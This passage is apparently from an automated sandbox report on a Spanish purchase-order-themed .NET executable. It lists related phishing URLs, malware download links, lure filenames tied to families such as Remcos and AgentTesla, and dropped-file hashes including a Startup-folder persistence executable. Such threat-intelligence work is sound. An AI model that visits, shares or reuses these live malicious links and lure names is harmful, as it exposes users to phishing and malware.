QtMTE3Njg1Mjg2MS0xMzc4MTQ4OVwifSIsIm5iZiI6MTcxNjc5NjM3MCwiZXhwIjoxNzE2Nzk2NjcwLCJpc3MiOiIwMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDBAOWIwODI5YjktYmUzOS00MzM2LWE3NjYtZjhjOWRjMmM3MWE0IiwiYXVkIjoiMDAwMDAwMDItMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwL2F0dGFjaG1lbnRzLm9mZmljZS5uZXRAOWIwODI5YjktYmUzOS00MzM2LWE3NjYtZjhjOWRjMmM3MWE0IiwiaGFwcCI6Im93YSJ9.QgmzIBWvZG6gLwDV2SGPl9TdStXctQrpU_xiIGcL5I4eoVDkUPzqcKcrSAnwOD_E73nNMbCTWC-kgcJIIFGhLmh8iFWITRD5MwmaJN23JV7c8rlmzHlxnoqm8tPo98Soui3XZZYSaJZVTruXDBhUCiweHA69qYSoZDJxVUYZDvl5KvXMWJkA_ui0Vq1Sw7pPL5h9t4_QlGAarVBz6O9q21EGSBoX_hWPpcaEGJwoBDVeI-G6VvbkXzy9bJEMEZ6N-WzLyQtuKS9HVJBafIkUxsf0pIhhnJUluyukhnQ1dZohnpQr8e5v0Xoa3SObMFt_C5SeZHG2hFyxqFdeBhKQ_w&X-OWA-CANARY=X-OWA-CANARY_cookie_is_null_or_empty&owa=outlook.office.com&scriptVer=20240517003.15&clientId=1A63CAED249649AEBB5264A13128C2B5&animation=true&persistenceId=80cb7b14-7011-42b1-acde-250d928510f9	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://docsend.com/view/qqrrvyqndwsixgqg	Get hash	malicious	Phisher	Browse	172.67.137.213
	https://url.za.m.mimecastprotect.com/s/dkSWC8qYY1u9oZr4unuoBl?domain=t.co	Get hash	malicious	Unknown	Browse	104.17.2.184
	https://mary-7.ispring.com/app/preview/df7e6170-1759-11ef-9d84-1e3de37e0836	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://mary-7.ispring.com/app/preview/df7e6170-1759-11ef-9d84-1e3de37e0836	Get hash	malicious	Unknown	Browse	188.114.96.3
	Ref19920830281982938RT.xls	Get hash	malicious	Remcos	Browse	188.114.97.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	doc.25.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	seznam objedn#U00e1vek-405598204.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	1d#U0422.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Nesyxzngip.exe	Get hash	malicious	Njrat	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Get hash	malicious	AsyncRAT, DcRat, StormKitty, VenomRAT	Browse	188.114.96.3
	ORDEM DE COMPRA.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	t3h7DNer1Q.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	188.114.96.3
	f9oE743c23.exe	Get hash	malicious	LimeRAT	Browse	188.114.96.3
	Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	DEsFjZJcR0.exe	Get hash	malicious	AsyncRAT	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	proforma invoice.bit.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	188.114.97.3
	INV 0983 OSY 240524_PDF.exe	Get hash	malicious	AgentTesla	Browse	188.114.97.3
	PO_27052024.exe	Get hash	malicious	AgentTesla	Browse	188.114.97.3
	01vwXiyQ8K.exe	Get hash	malicious	Quasar	Browse	188.114.97.3
	xA4LQYIndy.exe	Get hash	malicious	DCRat	Browse	188.114.97.3
	https://kruekanlogin.gitbook.io/	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://fbreview-requestnow.github.io/ajaz	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://mega.nz/file/wncXiYhZ#ABJEpmoiGH0hIeVVKQy7V_ALtGclDnJ4rFrDjwZ8kDE	Get hash	malicious	DCRat	Browse	188.114.97.3
	wtrD6RiHlm.exe	Get hash	malicious	RedLine	Browse	188.114.97.3
	https://newsklikdisini5bekbg0.3bsz4.xyz/	Get hash	malicious	Unknown	Browse	188.114.97.3

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	OSE - PO & FCST - ___-LT24052303183991-01.exe	Get hash	malicious	Remcos	Browse
	msimg32.dll	Get hash	malicious	Remcos	Browse
	DHL INVOICE.scr.exe	Get hash	malicious	AgentTesla	Browse
	DHL INVOICE.scr.exe	Get hash	malicious	AgentTesla	Browse
	Hesap hesaphareketi-01.exe	Get hash	malicious	AgentTesla	Browse
	FW CMA SHZ Freight invoice CHN1080769.exe	Get hash	malicious	AgentTesla	Browse
	USD BANK DETAILS.PNG.exe	Get hash	malicious	AgentTesla	Browse
	new order.exe	Get hash	malicious	AgentTesla	Browse
	New order.exe	Get hash	malicious	AgentTesla	Browse
	51 Electronic Invoicing .pdf.exe	Get hash	malicious	AgentTesla	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NUEVA ORDEN DE C_f7bac2445179e8f2c312d8977cbf32c417e6_15c0ca2f_f5328e29-51a0-46c5-8335-48b5900a66c4\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.25673993201905
Encrypted:	false
SSDEEP:	192:PMmKC3+D0UnZpaWQ8R7ga8SXMdSuiFoH4lO8lFzf:ZKC3+wUnZpaS8k0SuiFoH4lO8X
MD5:	F583460A6BBD4D50DC1C315CC5C23641
SHA1:	FFB49A344326F5FBC5B8D5E56AB38B0D327FD900
SHA-256:	FD0C91C0639063B2C92BCE1000EA5BBA09F984E3A7228F5CCF48A2CDF1AA61E6
SHA-512:	9A84F63D13692F54B02C7C4B15A597AA10AAA64C0168941FE546D9E72AA1E8C266055EA974ED7324C8786EAC2AA388BDABB581B1A0A619E3D5C085A480238393
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.1.2.7.8.8.0.3.4.3.5.4.1.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.1.2.7.8.8.0.6.1.2.2.9.2.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.3.2.8.e.2.9.-.5.1.a.0.-.4.6.c.5.-.8.3.3.5.-.4.8.b.5.9.0.0.a.6.6.c.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.2.d.f.7.9.6.-.e.b.f.4.-.4.4.a.6.-.b.5.b.0.-.9.9.7.8.1.8.6.d.7.e.a.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.N.U.E.V.A. .O.R.D.E.N. .D.E. .C.O.M.P.R.A.s.x.l.x.....e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.O.p.u.z.u.c.i.m.i.b.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.a.c.-.0.0.0.1.-.0.0.1.5.-.1.b.6.9.-.5.0.6.a.1.f.b.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.3.4.9.e.3.9.5.5.1.9.c.0.f.9.5.6.9.d.d.d.8.8.f.7.0.a.e.4.0.4.b.0.0.0.0.0.0.0.0.!.0.0.0.0.b.9.c.7.e.7.a.6.c.9.d.b.7.7.1.0.2.9.6.e.f.2.e.e.0.f.1.9.f.3.a.f.5.6.2.c.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3EB3.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Mon May 27 10:20:04 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	574844
Entropy (8bit):	3.091421320214727
Encrypted:	false
SSDEEP:	3072:6vJH4WRCMTkkBbpWlgT1YR8F2B3fEWaSmwyaXwcwN:YYCBd7C8F2lOSmwyW
MD5:	F861C855EA9046A31B41EB195E63982C
SHA1:	58B65A1F156789E911CC05F0DFFF3A803FC86A59
SHA-256:	B1CEC3EE6581B1BD972789334C4E0AECC316456D3339D0AEAC9726FCBF88579D
SHA-512:	84CEC2FC01DAA772A81661D45E8468AC9AC08C2E75292034CE6694F753EDFAF9D4F9A355701856FBB4684E4FA00076E2C6216844EC65A430D49AEAA324690C77
Malicious:	false
Preview:	MDMP..a..... .......T^Tf....................................$....(......L2...(.......s..\...........l.......8...........T............=..\|...........4[.......... ]..............................................................................eJ.......]......Lw......................T...........I^Tf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4645.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	9122
Entropy (8bit):	3.7241574527870984
Encrypted:	false
SSDEEP:	192:R6l79RJdztj56YwvUyuH6gmfXD1AlprY89bAm7f/Hgm:R6lXJ5X6YIU9agmfXD1ANASf9
MD5:	3F721409A5865BF3CF267443683A6A83
SHA1:	52B158DABEFC00FDF766646BD4BB3867FE81E898
SHA-256:	DB5AE6A3F9E3AC500DC4F69D80B30051F32D94E2F219CDC806F918E9D31F0F31
SHA-512:	493A5B5831E3CA032DE1AFD516FB47795B2474CAD746A5D34EA96D765BA69790888C4916FEE2A205C57B6CA538BC44239A1C1835C9F82ADC85CEE31F1D4882A9
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...3.4.4.8...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.3.4.4.8.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4675.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	4.583221860437883
Encrypted:	false
SSDEEP:	48:cvIwr7SGl8zsiJgkZ71I9O5WpW8VYUYm8M4J3QRl0cFk/yq85rT2Tblly2F2nd:uIafwh7hI7VgJUaUsjx0nd
MD5:	14097D0F8EC2ABB89349377FD738BA26
SHA1:	FB5F56FE37829EB28AD68C79C79E3C730088A1D7
SHA-256:	2473447BDD3DAA230E372C0DE3A700AF14FEDA42B57DBC7C037E30F38C4FA5AE
SHA-512:	7EBAB6BB7C5F96A0F52156FA54B4E93BF3606E47CA63D94C7255210A5B793757BC4479F37376F35C81F692C3475BB4FFB0D170067925755382C5AD92AA80EF47
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="3448" />.. <arg nm="verqfe" val="3448" />.. <arg nm="csdbld" val="3448" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222685152" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	22568
Entropy (8bit):	5.562389750690929
Encrypted:	false
SSDEEP:	384:xnj+JPwvGr1eE52tSp1cFkzXIX8eSA6CD2+Y9gE+kMyXgiN0HJhT4bmEE10vUFOl:9ny1CtSoE4MNtjl+1M4VKXJQFQ6cKBbK
MD5:	0843A9B2CC7631A985D41FB485A31996
SHA1:	A60B27DC48108FAD5D9E3B6712A1AB5E2D65149F
SHA-256:	10B5D3A36FBED91987EA9D4CFF017E4CEA8FD9AEF6DAF7D757EE3B30D2F32378
SHA-512:	D4480CB406604CE94FF7B9C84045E924A0E09BA0F627F606DE88E5D220C464DAA49ED8C0DDB230F8B1807897D8CFA7BDAC574052C50E987A2B49D7E01D752D3C
Malicious:	false
Preview:	@...e................................................@..........H...............o..b~.D.poM...=..... .Microsoft.PowerShell.ConsoleHostD...............E...y.BG.\..............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xiw1g43.whz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34dbr0qw.55s.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aqoqxckf.01r.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fnabt4oe.n5g.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqvkcwwr.tfw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmuhjihw.amo.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	45984
Entropy (8bit):	6.16795797263964
Encrypted:	false
SSDEEP:	768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
MD5:	9D352BC46709F0CB5EC974633A0C3C94
SHA1:	1969771B2F022F9A86D77AC4D4D239BECDF08D07
SHA-256:	2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
SHA-512:	13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: OSE - PO & FCST - ___-LT24052303183991-01.exe, Detection: malicious, Browse Filename: msimg32.dll, Detection: malicious, Browse Filename: DHL INVOICE.scr.exe, Detection: malicious, Browse Filename: DHL INVOICE.scr.exe, Detection: malicious, Browse Filename: Hesap hesaphareketi-01.exe, Detection: malicious, Browse Filename: FW CMA SHZ Freight invoice CHN1080769.exe, Detection: malicious, Browse Filename: USD BANK DETAILS.PNG.exe, Detection: malicious, Browse Filename: new order.exe, Detection: malicious, Browse Filename: New order.exe, Detection: malicious, Browse Filename: 51 Electronic Invoicing .pdf.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........\|...P...........................................r...p(....2.(....(....z..r...p(....(....(......}......{.....s..........0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t........0..(....... ....s$........o%....X..(....-...o&....0...........('......&.........................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.327878955252209
Encrypted:	false
SSDEEP:	6144:kRJufhX4RxLT+y2H4A0WBIIQfTa765q/E5ySvL+ML61VhcRo5d5OWiBec:IJM3BIdBvL+S6cIdYFd
MD5:	CCDCB2F2A4EDE8C45B4EB3D3A31E481C
SHA1:	33D29A5A51BF6672467D168CDEA59D42B7C4CA25
SHA-256:	F8D5741718FCC459414A7C765125B1A7EE5657DCE4D1B85BF24E1044BC1CB0E0
SHA-512:	4EE0F5976254FBD61F9FFD10B4CBEC29D41237AA31EB55EFC840FA1EC59B64ED60F4DA02C20A6D4F16F2C28D7B4EBB24971A6C10B3AC60FD1518C6AA2C128F91
Malicious:	false
Preview:	regfO...O....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...p...................................................................................................................................................................................................................................................................................................................................................D........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1141
Entropy (8bit):	4.442398121585593
Encrypted:	false
SSDEEP:	24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
MD5:	6FB4D27A716A8851BC0505666E7C7A10
SHA1:	AD2A232C6E709223532C4D1AB892303273D8C814
SHA-256:	1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
SHA-512:	3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
Malicious:	false
Preview:	Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

Static File Info

General

File type:	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.961419796057265
TrID:	Win64 Executable Console Net Framework (206006/5) 48.58% Win64 Executable Console (202006/5) 47.64% Win64 Executable (generic) (12005/4) 2.83% Generic Win/DOS Executable (2004/3) 0.47% DOS Executable Generic (2002/1) 0.47%
File name:	NUEVA ORDEN DE COMPRAsxlx..exe
File size:	1'483'760 bytes
MD5:	9ab5f38a68ce1f4821c6d5ca8704eefd
SHA1:	b9c7e7a6c9db7710296ef2ee0f19f3af562c7707
SHA256:	e07e6330a6b7302b833d231f8b8e6fd1dd6c3d1ff5c5bb43c6d291ed61fe131e
SHA512:	b2ed86033c5b42226d9be424d24bfb3faae84541472b12a8a49399f1eb239162150b8ed0e88444294c219e731c220bfee06816c9a191144156bf395288ce2cfc
SSDEEP:	24576:sNofEKA3DA6Y4KbIRWX8HAy6w6wHbuQai3c+zK0/iaVEemlREfExdH+is:IocHVIx/w7OiTK0bqHREfAdeis
TLSH:	6B6522905734510DE2FF4A30A8B87DEA02AF62616497C3CBADC544BB89E1F8526C59F3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0.................. ....@...... .......................`............`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x8CAAC51A [Thu Oct 13 20:03:38 2044 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0xa3c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x23af4	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x21b10	0x21c00	4150a40e41b2626ced87a57fb0f91d90	False	0.4781756365740741	data	6.179048368828677	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0xa3c	0xc00	64b52e8220f6798e7813c3ac42bdfd96	False	0.2685546875	data	4.4291698634963	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
